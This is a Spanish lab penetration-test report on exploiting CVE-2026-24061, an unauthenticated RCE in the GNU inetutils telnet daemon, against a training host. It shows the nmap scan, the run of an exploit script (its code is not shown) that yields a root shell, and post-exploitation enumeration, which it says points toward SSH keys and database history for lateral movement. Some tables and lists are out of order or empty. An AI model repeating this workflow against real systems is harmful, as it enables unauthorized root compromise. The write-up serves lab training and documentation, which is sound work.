
Informe/hallazgo de CVE-2026-24061 dentro del laboratorio Cyberhawks
Créditos: @SafeBreach-Labs
CVE: CVE-2026-24061
Laboratorio: Cyberhawks Lab
Objetivo: 10.1.1.1 (demo.cyberhawks.lab)
ID del hallazgo: WU-08
Fecha: 2026-09-08
Severidad: Crítica
Estado: Confirmado / Explotado
Durante una evaluación del entorno de laboratorio de Cyberhawks, se identificó y explotó con éxito una vulnerabilidad de Ejecución Remota de Código (RCE) no autenticada en el host objetivo (10.1.1.1). La explotación de CVE-2026-24061 a través de un servicio Telnet expuesto (TCP/23) resultó en una shell interactiva con privilegios de root, otorgando control administrativo total sobre el sistema.
| Campo | Valor |
|---|---|
| IP del objetivo | 10.1.1.1 |
Se realizó un escaneo de versiones de servicios con Nmap contra el objetivo para enumerar puertos y servicios abiertos.
Comando:
nmap -sV 10.1.1.1
Resumen de resultados:
Observaciones notables:
CVE-2026-24061 es una vulnerabilidad de Ejecución Remota de Código no autenticada que afecta al componente del daemon Telnet de GNU inetutils 2.6. La explotación permite a un atacante remoto no autenticado ejecutar comandos arbitrarios en el sistema objetivo con los privilegios del servicio en ejecución — en este caso, root.
Se ejecutó un script de exploit en Python creado específicamente (telnet_rce.py) dirigido a CVE-2026-24061 contra el servicio Telnet vulnerable.
Comando:
python3 telnet_rce.py 10.1.1.1
Salida del exploit:
[*] Connected to 10.1.1.1:23
[*] Interactive session started. Use Ctrl+C to quit.
Linux 6.12.41+deb13-amd64 (demo.cyberhawks.lab) (pts/0)
root@demo:~#
Tras obtener una shell, los siguientes comandos confirmaron el nivel de acceso alcanzado:
Verificación de identidad:
root@demo:~# id
uid=0(root) gid=0(root) groups=0(root)
Enumeración del sistema de archivos:
root@demo:~# ls -la
total 36
drwx------ 6 root root 4096 Aug 28 14:47 .
drwxr-xr-x 19 root root 4096 Aug 28 15:37 ..
-rw-r--r-- 1 root root 607 May 12 2025 .bashrc
drwx------ 4 root root 4096 Sep 6 2025 .cache
drwxr-xr-x 3 root root 4096 Sep 6 2025 .config
drwxrwxr-x 3 root root 4096 Sep 6 2025 .local
-rw------- 1 root root 261 Sep 6 2025 .mariadb_history
-rw-r--r-- 1 root root 132 May 12 2025 .profile
drwx------ 2 root root 4096 Sep 6 2025 .ssh
Verificación de la versión del servicio
root@demo:~# telnet --version
telnet (GNU inetutils) 2.6
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Written by many authors.
Hallazgos clave posteriores a la explotación:
.mariadb_history — indica uso activo de la base de datos MariaDB; potencial para una mayor recolección de credenciales o exfiltración de datos..ssh/ — puede contener claves privadas utilizables para movimiento lateral hacia otros hosts.root (UID 0) sin necesidad de ningún paso de escalada de privilegios.| Categoría | Evaluación |
|---|---|
| Confidencialidad | Crítica — todos los datos del sistema son accesibles |
| Integridad | Crítica — el atacante puede modificar o destruir cualquier dato |
| Disponibilidad | Crítica — el atacante puede terminar servicios o bloquear el sistema |
Se logró el compromiso total del sistema en un único paso no autenticado. Un atacante con acceso a este segmento de red podría:
apt update && apt install inetutils-telnetd
| Artefacto | Descripción |
|---|---|
| Salida del escaneo de Nmap | Enumeración completa de puertos/servicios de 10.1.1.1 |
telnet_rce.py | Script de exploit utilizado para desencadenar CVE-2026-24061 |
| Registro de sesión de shell | Transcripción de la shell interactiva de root |
Informe preparado para Cyberhawks Lab — solo con fines educativos.
| Nombre de host del objetivo | demo.cyberhawks.lab |
| Sistema operativo | Linux 6.12.41+deb13-amd64 (Debian 13) |
| SO del atacante | Parrot OS |
| Tipo de evaluación | Prueba de penetración (Entorno de laboratorio) |
| Puerto | Estado | Servicio |
|---|
| 21/tcp | Abierto | FTP (tcpwrapped) |
| 22/tcp | Abierto | SSH (tcpwrapped) |
| 23/tcp | Abierto | Telnet |
| 25/tcp | Abierto | SMTP (tcpwrapped) |
| 53/tcp | Abierto | DNS (tcpwrapped) |
| 80/tcp | Abierto | HTTP (tcpwrapped) |
| 110/tcp | Abierto | POP3 (tcpwrapped) |
| 111/tcp | Abierto | RPC (tcpwrapped) |
| 139/tcp | Abierto | NetBIOS (tcpwrapped) |
| 143/tcp | Abierto | IMAP (tcpwrapped) |
| 445/tcp | Abierto | SMB (tcpwrapped) |
| 2049/tcp | Abierto | NFS (tcpwrapped) |
| 3306/tcp | Abierto | MySQL/MariaDB (tcpwrapped) |
| 3389/tcp | Abierto | RDP (tcpwrapped) |
| 5901/tcp | Abierto | VNC (tcpwrapped) |
| Campo | Detalle |
|---|
| CVE | CVE-2026-24061 |
| Servicio afectado | Telnet (GNU inetutils 2.6, TCP/23) |
| Tipo de vulnerabilidad | Ejecución Remota de Código (RCE) no autenticada |
| Puntuación CVSS | Crítica |
| Autenticación requerida | Ninguna |
| Interacción del usuario requerida | Ninguna |